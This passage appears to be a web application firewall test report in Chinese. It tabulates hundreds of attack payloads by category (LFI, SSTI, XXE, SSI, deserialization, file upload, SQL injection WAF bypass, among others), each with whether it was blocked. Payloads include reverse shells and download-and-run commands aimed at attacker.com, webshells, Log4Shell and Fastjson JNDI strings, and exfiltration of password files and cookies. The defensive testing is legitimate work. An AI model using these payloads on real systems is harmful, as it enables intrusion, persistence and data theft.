🛡️POST命令注入 - 写入 crontab 定时任务持久化; echo '* * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1' | crontab -403

4.10 file inclusion

  • 项目数: 11 | 通过: 11 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTLFI - php://input POST 原始数据执行代码php://input + Body: <?php system('id');?>403
🛡️GETLFI - PHP 封装器读取源码 (base64 绕过)php://filter/convert.base64-encode/resource=index.php403
🛡️GETLFI - 读取 Linux 密码文件../../../../../../../../etc/passwd403
🛡️GETLFI - expect:// 封装器执行系统命令expect://cat /etc/passwd403
🛡️GETLFI - data:// 封装器直接命令执行data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTs/Pg==403
🛡️GETLFI - phar:// 反序列化 RCE (先上传 phar 文件任意后缀, 再触发 metadata 反序列化)phar://./uploads/evil.gif403
🛡️GETLFI - PHP filter chain 生成 RCE payload (php_filter_chain_generator)php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022C...403
🛡️GETLFI - Pearcmd.php RCE (register_argc_argv=On)/usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET[1])?>+/tmp/shell.php403
🛡️GETLFI - zip:// 封装器解压包含 (需先上传含 webshell 的 zip 文件)zip://./uploads/evil.zip%23shell.php403
🛡️GETLFI - compress.zlib:// 封装器读取流量compress.zlib://file:///etc/passwd403
🛡️GETLFI - Windows ADS (Alternate Data Stream) 读取隐藏数据c:\inetpub\wwwroot\index.php::$DATA403

4.11 directory traversal

  • 项目数: 12 | 通过: 12 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️GET目录穿越 - 读取 Windows SAM 注册表文件..\..\..\..\windows\system32\config\SAM403
🛡️GET目录穿越 - 读取 Nginx 站点配置文件../../../etc/nginx/sites-enabled/default403
🛡️GET目录穿越 - 读取 root 用户 SSH 私钥../../../../root/.ssh/id_rsa403
🛡️GET目录穿越 - 读取 Linux 密码文件../../../../etc/passwd403
🛡️GET目录穿越 - 读取 Web 应用数据库配置文件../../../var/www/html/config/database.php403
🛡️GET目录穿越 - Zip Slip 压缩包路径穿越../../../../var/www/html/shell.php403
🛡️GET目录穿越 - URL 编码绕过过滤%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd403
🛡️GET目录穿越 - 压缩备份文件下载../../../var/backups/website.tar.gz403
🛡️GET目录穿越 - Nginx 配置别名穿越读取敏感文件../aliased/../../../etc/shadow403
🛡️GET目录穿越 - Tomcat WAR 部署目录穿越../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml403
🛡️GET目录穿越 - Windows 大小写绕过..\..\..\..\Program Files\Apache\conf\httpd.conf403
🛡️GET目录穿越 - 路径规范化绕过 (....//)....//....//....//etc/passwd403

4.12 ssti

  • 项目数: 18 | 通过: 18 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTSSTI - Jinja2 反弹 Shell (Python){{ config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"').read() }}403
🛡️POSTSSTI - Twig 读取 /etc/passwd 密码文件 (PHP){{ '/etc/passwd'|file_excerpt(1, -1) }}403
🛡️POSTSSTI - Freemarker 反弹 Shell (Java)<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'")}403
🛡️POSTSSTI - Velocity 读取 shadow 文件 (Java)#set($x=$rt.exec("cat+/etc/shadow"))403
🛡️POSTSSTI - ERB 读取数据库配置 YAML (Ruby)<%= File.read('/var/www/html/config/database.yml') %>403
🛡️POSTSSTI - Smarty 远程文件包含 Getshell (PHP){capture}{include file='http://attacker.com/shell.txt'}{/capture}403
🛡️POSTSSTI - Handlebars 执行命令读取 SSH 私钥{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with stri...403
🛡️POSTSSTI - ASP.NET Razor 下载执行 PowerShell Payload@System.Diagnostics.Process.Start("cmd.exe","/c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')")403
🛡️POSTSSTI - Mako 写入 SSH 公钥持久化 (Python)<% import os; os.system("echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys") %>403
🛡️POSTSSTI - Pug/Jade 读取环境变量泄露数据库密码#{global.process.mainModule.require('child_process').execSync('env | grep -i pass')}403
🛡️POSTSSTI - Jinja2 绕过过滤执行命令 (lipsum 链){{ lipsum.__globals__['os'].popen('cat /etc/passwd').read() }}403
🛡️POSTSSTI - Jinja2 绕过过滤读取文件 (attr/getitem 链){{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}403
🛡️POSTSSTI - Tornado SSTI 读取敏感文件 (Python){% import os %}{{ os.popen('cat /etc/shadow').read() }}403
🛡️POSTSSTI - Pebble 读取环境变量 (Java){{ getClass().forName('java.lang.Runtime').getRuntime().exec('env') }}403
🛡️POSTSSTI - Nunjucks 命令执行读取密码 (Node.js){{ range.constructor("return global.process.mainModule.require('child_process').execSync('cat /etc/passwd')")() }}403
🛡️POSTSSTI - Thymeleaf SpringEL 命令执行读取 AWS 凭证 (Java)${T(java.lang.Runtime).getRuntime().exec('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ -o /tmp/aws')}403
🛡️POSTSSTI - Jinja2 通过 config.items 遍历敏感配置{% for key, value in config.items() %}{% if 'SECRET' in key or 'PASS' in key %}{{ config.__class__.__init__.__globals__['os'].popen('curl http://attac...403
🛡️POSTSSTI - Mustache RCE 通过构造函数链{{#constructor}}{"name":"a","prototype":{"console":{"log":"require('child_process').execSync('cat /etc/passwd')"}}}{{/constructor}}403

4.13 xxe

  • 项目数: 14 | 通过: 14 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTXXE - 读取系统密码文件<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>403
🛡️POSTXXE - OOB 带外数据窃取 (参数实体 + 外部 DTD)<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/xxe.dtd">%xxe;%exfil;]><foo>test</foo>403
🛡️POSTXXE - PHP expect 封装器执行系统命令<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>403
🛡️POSTXXE - Billion Laughs 拒绝服务攻击<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;...403
🛡️POSTXXE - 读取 Web 目录列表枚举文件<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///var/www/">]><foo>&xxe;</foo>403
🛡️POSTXXE - Base64 编码绕过 WAF 过滤<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><foo>&xxe;</foo>403
🛡️POSTXXE - XInclude 绕过 DOCTYPE 限制<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>403
🛡️POSTXXE - Error-based 通过错误消息泄露文件内容<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"><!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://attacker.com/?%xxe;'>"...403
🛡️POSTXXE - SSRF 端口扫描内网服务<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.1:8080">]><foo>&xxe;</foo>403
🛡️POSTXXE - 读取 Office Open XML 文件 (docx/xlsx 解包)<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///var/www/secret.docx">]><foo>&xxe;</foo>403
🛡️POSTXXE - SVG 文件上传型 XXE 读取密码<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><svg xmlns="http://www.w3.org/2000/svg">&xxe;</svg>403
🛡️POSTXXE - FTP 协议 SSRF 攻击内网 FTP 服务<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "ftp://admin:password@10.0.0.1/">]><foo>&xxe;</foo>403
🛡️POSTXXE - jar:// 协议读取 Java 应用配置<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///var/www/app.war!/WEB-INF/web.xml">]><foo>&xxe;</foo>403
🛡️POSTXXE - 读取 .bash_history 窃取历史命令<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///root/.bash_history">]><foo>&xxe;</foo>403

4.14 ssi injection

  • 项目数: 12 | 通过: 12 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTSSI - 命令执行读取密码文件<!--#exec cmd="cat /etc/passwd" -->403
🛡️POSTSSI - 命令执行反弹 Shell<!--#exec cmd="bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" -->403
🛡️POSTSSI - 包含任意文件泄露敏感信息<!--#include virtual="/etc/shadow" -->403
🛡️POSTSSI - 文件大小判断(盲注信息泄露)<!--#fsize file="/etc/shadow" -->403
🛡️POSTSSI - 写入 Webshell 到 Web 目录<!--#exec cmd="echo '<?php system($_GET[1]);?>' > /var/www/html/shell.php" -->403
🛡️POSTSSI - 下载执行远程木马<!--#exec cmd="wget http://attacker.com/shell.sh -O /tmp/s.sh; bash /tmp/s.sh" -->403
🛡️POSTSSI - 输出 DOCUMENT_ROOT 泄露 Web 路径<!--#echo var="DOCUMENT_ROOT" -->403
🛡️POSTSSI - 输出全部环境变量泄露敏感配置<!--#printenv -->403
🛡️POSTSSI - ESI 注入窃取 Cookie (Edge Side Includes)<esi:include src="http://attacker.com/steal?cookie=$(HTTP_COOKIE)"/>403
🛡️POSTSSI - ESI 注入替换页面内容为钓鱼页面<esi:include src="http://attacker.com/phish.html"/>403
🛡️POSTSSI - 读取数据库配置文件<!--#exec cmd="cat /var/www/html/config/database.php" -->403
🛡️POSTSSI - 通过变量赋值泄露敏感信息<!--#set var="sensitive" value="$DOCUMENT_ROOT" --><!--#echo var="sensitive" -->403

4.15 xpath injection

  • 项目数: 13 | 通过: 13 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTXPath - 认证绕过注入 OR 永真条件' or '1'='1403
🛡️POSTXPath - 闭合 XPath 注入永真条件绕过登录x' or 1=1 or 'x'='y403
🛡️POSTXPath - 认证绕过注入 空字符 OR 条件' or ''='403
🛡️POSTXPath - 盲注提取用户密码长度' and string-length(//user[name/text()='admin']/password)=8 and '1'='1403
🛡️POSTXPath - 盲注逐字符猜解用户密码' and substring(//user[name/text()='admin']/password,1,1)='a' and '1'='1403
🛡️POSTXPath - 盲注利用 codepoints-to-string 猜解密码' and substring(//user[name/text()='admin']/password,1,1)=codepoints-to-string(97) and '1'='1403
🛡️POSTXPath - 逐节点提取 XML 文档结构' and count(/*)=1 and '1'='1403
🛡️POSTXPath - 提取所有用户节点数据泄露全部账户信息' or 1=1] | //user[1=1403
🛡️POSTXPath - 利用 name() 函数获取当前节点名泄露文档结构x' or name()='username' or 'x'='y403
🛡️POSTXPath - 提取 XML 根节点属性个数' and count(/@*)=1 and '1'='1403
🛡️POSTXPath - 利用 contains 函数盲注密码子串逐字符泄露' and contains(../password,'a') and '1'='1403
🛡️POSTXPath - OOB 带外攻击 通过 document() 外带数据到攻击者服务器' and doc('//attacker.com/x') and '1'='1403
🛡️POSTXPath - 利用 starts-with 函数盲注密码前缀' and starts-with(../password,'adm') and '1'='1403

4.16 prototype pollution

  • 项目数: 12 | 通过: 10 | 通过率: 83.3%
状态方法项目描述PayloadHTTP 状态码
🛡️POST原型污染 - Object.prototype 注入管理员权限{"__proto__":{"isAdmin":true}}403
⚠️POST原型污染 - constructor.prototype 注入管理员标记{"constructor":{"prototype":{"isAdmin":true}}}200
🛡️POST原型污染 - proto 嵌套注入 RCE (NODE_OPTIONS){"__proto__":{"shell":"node","env":{"NODE_OPTIONS":"--require /tmp/evil.js"}}}403
⚠️POST原型污染 - 绕过 JSON.parse 安全过滤 (obj 前缀){"obj.__proto__.status":"admin"}200
🛡️POST原型污染 - Lodash merge 注入 AST RCE{"constructor":{"prototype":{"type":"Program","body":[{"type":"ExpressionStatement","expression":{"type":"CallExpression","callee":{"type":"Identifier...403
🛡️POST原型污染 - jQuery $.extend 深度合并注入属性{"__proto__":{"shell":"/bin/bash","NODE_OPTIONS":"--eval require('child_process').execSync('curl attacker.com/$(cat /etc/passwd|base64)')"}}403
🛡️POST原型污染 - merge 函数注入 child_process 环境变量 RCE{"__proto__":{"env":{"EVIL":"require('child_process').execSync('id')"}}}403
🛡️POST原型污染 - path 属性污染导致任意文件读取{"__proto__":{"path":"/etc/passwd"}}403
🛡️POST原型污染 - exports.main 覆盖执行恶意代码{"__proto__":{"main":"/tmp/evil.js"}}403
🛡️POST原型污染 - .env 属性注入窃取环境变量{"__proto__":{"env":{"AWS_ACCESS_KEY_ID":"stolen","DATABASE_URL":"postgres://stolen"}}}403
🛡️POST原型污染 - nested 深度路径注入 (mongoose 风格){"a[b][__proto__][isAdmin]":"true"}403
🛡️POST原型污染 - JSON5 格式绕过检测{"__proto__":{"polluted":true}}403

4.17 xslt injection

  • 项目数: 12 | 通过: 12 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTXSLT - 读取系统密码文件<xsl:value-of select="unparsed-text('/etc/passwd')"/>403
🛡️POSTXSLT - PHP Wrapper 执行系统命令<xsl:value-of select="php:function('system','cat /etc/shadow')"/>403
🛡️POSTXSLT - Java Runtime 执行系统命令读取密码<xsl:value-of select="Runtime:getRuntime():exec('cat /etc/passwd')"/>403
🛡️POSTXSLT - .NET Process.Start 命令执行<xsl:value-of select="user:Process.Start('cmd.exe','/c whoami')"/>403
🛡️POSTXSLT - XXE 文件读取 /etc/passwd<!DOCTYPE xsl:stylesheet [<!ENTITY passwd SYSTEM "file:///etc/passwd">]><xsl:value-of select="&passwd;"/>403
🛡️POSTXSLT - EXSLT document() SSRF 攻击内网<xsl:value-of select="document('http://169.254.169.254/latest/meta-data/')"/>403
🛡️POSTXSLT - 文件写入 (EXSLT exsl:document)<exsl:document href="/var/www/html/xslt.php" method="text"><?php system($_GET[1]);?></exsl:document>403
🛡️POSTXSLT - document() 端口扫描内网服务<xsl:value-of select="document('http://10.0.0.1:3306')"/>403
🛡️POSTXSLT - Java XSLT 读取 Java 系统属性<xsl:value-of select="system-property('java.version')"/>403
🛡️POSTXSLT - .NET 加载外部 XSLT 文件实现代码注入<xsl:include href="http://attacker.com/evil.xslt"/>403
🛡️POSTXSLT - 读取 /root/.bash_history<xsl:value-of select="unparsed-text('/root/.bash_history')"/>403
🛡️POSTXSLT - XML 外部实体注入 + 命令执行<xsl:value-of select="system-property('xsl:vendor')"/><xsl:value-of select="php:function('system','id')"/>403

4.18 graphql injection

  • 项目数: 12 | 通过: 1 | 通过率: 8.3%
状态方法项目描述PayloadHTTP 状态码
⚠️POSTGraphQL - 内省查询 dump 数据库 Schema 泄露全部结构和字段{__schema{types{name,fields{name,type{name,kind}}}}}200
⚠️POSTGraphQL - 类型枚举查询 获取单个类型定义泄露敏感字段{__type(name:"User"){name,fields{name,type{name,kind,ofType{name,kind}}}}}200
⚠️POSTGraphQL - 内省查询 dump mutation 操作泄露数据修改入口{__schema{mutationType{name,fields{name,args{name,type{name,kind}}}}}}200
⚠️POSTGraphQL - 深度嵌套查询 DoS 攻击(资源耗尽拖垮服务){user{posts{comments{author{posts{comments{author{posts{comments{content}}}}}}}}}}200
⚠️POSTGraphQL - Batching 攻击 批量并发认证爆破绕过速率限制[{"query":"mutation{login(username:\"admin\",password:\"admin123\"){token}}"},{"query":"mutation{login(username:\"admin\",password:\"password\"){token...200
⚠️POSTGraphQL - 别名 Aliases 绕过速率限制并发暴力破解{m1:login(p:"1"){t} m2:login(p:"2"){t} m3:login(p:"3"){t} m4:login(p:"4"){t} m5:login(p:"5"){t}}200
⚠️POSTGraphQL - 内省查询 + dump 全部 Directive 定义泄露安全策略{__schema{directives{name,description,locations,args{name,description}}}}200
⚠️POSTGraphQL - 无内省但利用字段推荐机制枚举隐藏字段{__schema{types{name}}} {user(id:1){name,NOTEXIST}}200
🛡️POSTGraphQL - SQL 注入通过 GraphQL 参数传递恶意查询窃取数据库{user(id:"1' UNION SELECT username,password FROM users--"){name,email}}403
⚠️POSTGraphQL - Mutation 注入创建管理员账户提权mutation{addUser(name:"hacker",email:"hacker@evil.com",role:"admin"){id,name,role}}200
⚠️POSTGraphQL - NoSQL 注入通过 GraphQL 参数提取所有用户数据{user(id:"{\"$gt\":\"\"}"){name,email,password}}200
⚠️POSTGraphQL - 内省查询 dump subscription 操作泄露实时数据通道{__schema{subscriptionType{name,fields{name,type{name,kind,ofType{name,kind}}}}}}200

4.19 java php dotnet deserialization

  • 项目数: 7 | 通过: 7 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POST反序列化 - PHP phar 反序列化 RCE (文件上传马 + phar:// LFI)O:10:"PHPObject":1:{s:6:"inject";s:10:"phpinfo();";}403
🛡️POST反序列化 - PHP unserialize 对象注入 RCEO:8:"Example2":1:{s:4:"hook";s:43:"system('curl attacker.com/$(whoami|base64)');";}403
🛡️POST反序列化 - Python pickle 反序列化反弹 Shellcos\nsystem\n(S'bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'\ntR.403
🛡️POST反序列化 - Ruby YAML 反序列化命令执行--- !ruby/object:Gem::Requirement\nrequirements:\n!ruby/object:Gem::DependencyList\nspecs:\n- !ruby/object:Gem::Source::Git\nname: evil\ngit: "curl attacke...`403
🛡️POST反序列化 - Node.js node-serialize RCE{"rce":"_$$ND_FUNC$$_function(){require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/attacker.com/4444 0>&1\"')}()"}403
🛡️POST反序列化 - Java Spring Boot RCE (Jackson gadgets)["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://attacker.com/evil.sq...403
🛡️POST反序列化 - PHP SoapClient SSRF 通过反序列化O:10:"SoapClient":2:{s:3:"uri";s:28:"http://169.254.169.254/latest/";s:8:"location";s:39:"http://169.254.169.254/latest/meta-data/";}403

4.20 java deserialization

  • 项目数: 11 | 通过: 11 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTJava - Fastjson JNDI 注入 RCE{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}403
🛡️POSTJava - Jackson JNDI 注入 RCE["org.springframework.context.support.ClassPathXmlApplicationContext","http://attacker.com/evil.xml"]403
🛡️POSTJava - log4j JNDI 注入 RCE (Log4Shell)${jndi:ldap://attacker.com:1389/Evil}403
🛡️POSTJava - Spring Cloud Function SPEL RCEspring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'")403
🛡️POSTFastjson WAF 绕过 - @type Unicode 编码绕过{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}403
🛡️POSTJava - XStream XML 反序列化 RCE<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder...403
🛡️POSTFastjson WAF 绕过 - $ref 引用机制绕过 (1.2.47){"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker....403
🛡️POSTFastjson WAF 绕过 - expectClass 白名单绕过 autoType{"@type":"java.lang.AutoCloseable","@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}403
🛡️POSTLog4Shell WAF 绕过 - lower 函数绕过 jndi 关键字${${lower:j}${lower:n}${lower:d}i:ldap://attacker.com:1389/Evil}403
🛡️POSTLog4Shell WAF 绕过 - :- 空变量拼接绕过 jndi 关键字${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com:1389/Evil}403
🛡️POSTLog4Shell WAF 绕过 - env 默认值绕过 jndi 关键字${${env:NaN:-j}ndi${env:NaN:-:}ldap://attacker.com:1389/Evil}403

4.21 php deserialization

  • 项目数: 6 | 通过: 6 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTPHP - unserialize RCE (Guzzle)O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:36:"\0GuzzleHttp\Cookie\CookieJar\0cookies";a:0:{}s:39:"\0GuzzleHttp\Cookie\FileCookieJar\0filename";s:25:...403
🛡️POSTPHP - phar 反序列化 RCE (Monolog)phar://uploads/shell.jpg.phar403
🛡️POSTPHP - Symfony Process RCEO:29:"Symfony\Component\Process\Process":7:{s:11:"commandline";s:41:"bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'";s:7:"cwd" ;N;s:3:"env";...403
🛡️POSTPHP - SoapClient SSRF + CRLF (通过反序列化)O:10:"SoapClient":3:{s:3:"uri";s:28:"http://169.254.169.254/latest/";s:8:"location";s:39:"http://169.254.169.254/latest/meta-data/";s:13:"_soap_versio...403
🛡️POSTPHP - PHPGGC Laravel RCEO:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"\0*\0events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"\0*\0queueResolver";a:2:{i:0;O:25:"Mock...403
🛡️POSTPHP - WordPress phpmailer RCE (CVE-2016-10033)O:9:"PHPMailer":1:{s:6:"Sender";s:52:"attacker -oQ/tmp/ -X/var/www/html/shell.php root";}403

4.22 python deserialization

  • 项目数: 7 | 通过: 7 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTPython - pickle RCE (反弹 Shell)cos\nsystem\n(S'bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'\ntR.403
🛡️POSTPython - pickle 写入文件 (exec)cos\nsystem\n(S'echo YmFzaCAtaSA+JiAvZGV2L3RjcC9hdHRhY2tlci5jb20vNDQ0NCAwPiYx |base64 -d|bash'\ntR.403
🛡️POSTPython - yaml.unsafe_load RCE!!python/object/apply:os.system ["cat /etc/shadow|base64|curl attacker.com -d @-"]403
🛡️POSTPython - PyYAML deserialize_all RCEpython: !!python/object/apply:subprocess.check_output [["id"]]403
🛡️POSTPython - ruamel.yaml RCE!!python/object/new:subprocess.check_output [["cat /etc/passwd"]]403
🛡️POSTPython - NumPy pickle 反序列化 RCEcos\nsystem\n(S'curl attacker.com/$(cat /etc/passwd|base64)'\ntR.403
🛡️POSTPython - pandas read_pickle RCEcos\nsystem\n(S'wget http://attacker.com/shell.py -O /tmp/shell.py; python3 /tmp/shell.py'\ntR.403

4.23 dotnet deserialization

  • 项目数: 4 | 通过: 4 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POST.NET - DataContractSerializer RCE (XAML 载荷)<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:Sys...403
🛡️POST.NET - SoapFormatter RCE<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><a1:Process id="ref-1" xmlns:a1="http://schemas.microsoft.com/...403
🛡️POST.NET - NetDataContractSerializer RCE<NetDataContractSerializer><Process xmlns="http://schemas.datacontract.org/2004/07/System.Diagnostics" xmlns:i="http://www.w3.org/2001/XMLSchema-insta...403
🛡️POST.NET - JavaScriptSerializer type confusion RCE{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"FileName":"cmd.exe","A...403

4.24 nodejs deserialization

  • 项目数: 6 | 通过: 6 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTNode.js - node-serialize + fs 读文件{"rce":"_$$ND_FUNC$$_function(){return require('fs').readFileSync('/etc/passwd','utf8')}()"}403
🛡️POSTNode.js - node-serialize RCE (IIFE){"rce":"_$$ND_FUNC$$_function(){require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/attacker.com/4444 0>&1\"')}()"}403
🛡️POSTNode.js - funcster RCE{"__js_function":"function(){return require('child_process').execSync('curl attacker.com/$(whoami|base64)')}"}403
🛡️POSTNode.js - serialize-javascript RCEfunction(){return require('child_process').execSync('cat /etc/shadow').toString();}()403
🛡️POSTNode.js - Cryo RCE{"root":"_CRYO_FUNC_function(){require('child_process').execSync('id')}"}403
🛡️POSTNode.js - serialize-to-js XSS to RCE{"key":"function(){return require('child_process').execSync('wget http://attacker.com/shell.sh -O /tmp/.x; bash /tmp/.x')}()"}403

4.25 ruby deserialization

  • 项目数: 3 | 通过: 3 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTRuby - Psych YAML RCE--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n? !ruby/object:OpenStruct\ntable:\n:defaults:\n:action: "system('cat /etc/shadow...403
🛡️POSTRuby - ERB template injection RCE<%= system('cat /etc/passwd') %>403
🛡️POSTRuby - ERB.new 对象注入 RCE<%= eval("File.read('/etc/shadow')") %>403

4.26 file upload

  • 项目数: 16 | 通过: 16 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POST文件上传 - PHP 双扩展名绕过 (shell.php.jpg) + Webshellshell.php.jpg <?php system($_GET[1]);?>403
🛡️POST文件上传 - PHP 后缀空格点号截断 (shell.php.) + Webshellshell.php. <?php system($_GET[1]);?>403
🛡️POST文件上传 - PHP phtml 扩展名绕过 + Webshellshell.phtml <?php system($_GET[1]);?>403
🛡️POST文件上传 - ASPX webshell 上传执行系统命令shell.aspx <%@ Page Language="C#"%><%System.Diagnostics.Process.Start("cmd.exe","/c whoami");%>403
🛡️POST文件上传 - JSP webshell 上传反弹 Shellshell.jsp <% Runtime.getRuntime().exec("curl http://attacker.com/$(whoami)"); %>403
🛡️POST文件上传 - SVG XSS 文件上传窃取 Cookie<svg xmlns="http://www.w3.org/2000/svg" onload="new Image().src='http://attacker.com/c?'+document.cookie"/>403
🛡️POST文件上传 - 图片马 GIF89a 头绕过 getimagesize() + WebshellGIF89a<?php system($_GET[1]);?>403
🛡️POST文件上传 - 空字节截断 shell.php%00.jpg + Webshellshell.php%00.jpg <?php system($_GET[1]);?>403
🛡️POST文件上传 - Content-Type 伪造 image/jpeg + WebshellContent-Type: image/jpeg <?php system($_GET[1]);?>403
🛡️POST文件上传 - IIS 6.0 分号绕过 (shell.asp;.jpg) + Webshellshell.asp;.jpg <% Execute(Request("cmd")) %>403
🛡️POST文件上传 - PHP7/PHP8 pht 扩展名绕过 + Webshellshell.pht <?php system($_GET[1]);?>403
🛡️POST文件上传 - ASP webshell (shell.cer 证书文件绕过)shell.cer <% Execute(Request("cmd")) %>403
🛡️POST文件上传 - Python pickle 文件反序列化 RCEmodel.pkl cos\nsystem\n(S'curl http://attacker.com/$(whoami)'\ntR.403
🛡️POST文件上传 - ZIP 符号链接攻击读取 /etc/passwdsymlink.zip [ZIP containing symlink: ../../etc/passwd]403
🛡️POST文件上传 - Nginx 请求体临时文件 + LFI Getshell 组合利用/tmp/nginx/body/0000000001 <?php system($_GET[1]);?>403
🛡️POST文件上传 - Elasticsearch 动态脚本上传 RCEscript.json {"script":{"lang":"painless","source":"java.lang.Runtime.getRuntime().exec('curl http://attacker.com/$(whoami)')"}}403

4.27 waf bypass sqli

  • 项目数: 20 | 通过: 20 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTSQLi WAF 绕过 - 空白字符替换绕过空格过滤 (%09 TAB)'%09UNION%09SELECT%091,user(),database(),4,5%09FROM%09mysql.user--403
🛡️POSTSQLi WAF 绕过 - 空白字符替换绕过空格过滤 (%0A 换行)'%0AUNION%0ASELECT%0A1,user(),version(),4,5%0AFROM%0Amysql.user--403
🛡️POSTSQLi WAF 绕过 - 空白字符替换绕过空格过滤 (%0D 回车)'%0DUNION%0DSELECT%0D1,version(),3,4,5--403
🛡️POSTSQLi WAF 绕过 - 空白字符替换绕过空格过滤 (%0C 换页)'%0CUNION%0CSELECT%0C1,user(),database(),4,5--403
🛡️POSTSQLi WAF 绕过 - 空白字符替换绕过空格过滤 (%A0 不间断空格)'%A0UNION%A0SELECT%A01,user(),database(),4,5--403
🛡️POSTSQLi WAF 绕过 - 多行注释替换空格1/**/AND/**/1=1--403
🛡️POSTSQLi WAF 绕过 - 内联注释绕过 WAF 关键字检测1/*!UNION*//*!SELECT*/1,user(),3--403
🛡️POSTSQLi WAF 绕过 - 括号分组替代空格1=(SELECT(1)FROM(users)WHERE(1=1))--403
🛡️POSTSQLi WAF 绕过 - 反引号包裹关键字绕过检测1%60UNION%60SELECT%601,2,3--403
🛡️POSTSQLi WAF 绕过 - 科学计数法替代等号'.e(0)UNION.e(0)SELECT.e(0)1,user(),version(),4,5.e(0)FROM.e(0)dual--403
🛡️POSTSQLi WAF 绕过 - 十六进制编码绕过关键字检测1 UNION SELECT 0x61646d696e,0x70617373776f7264,3--403
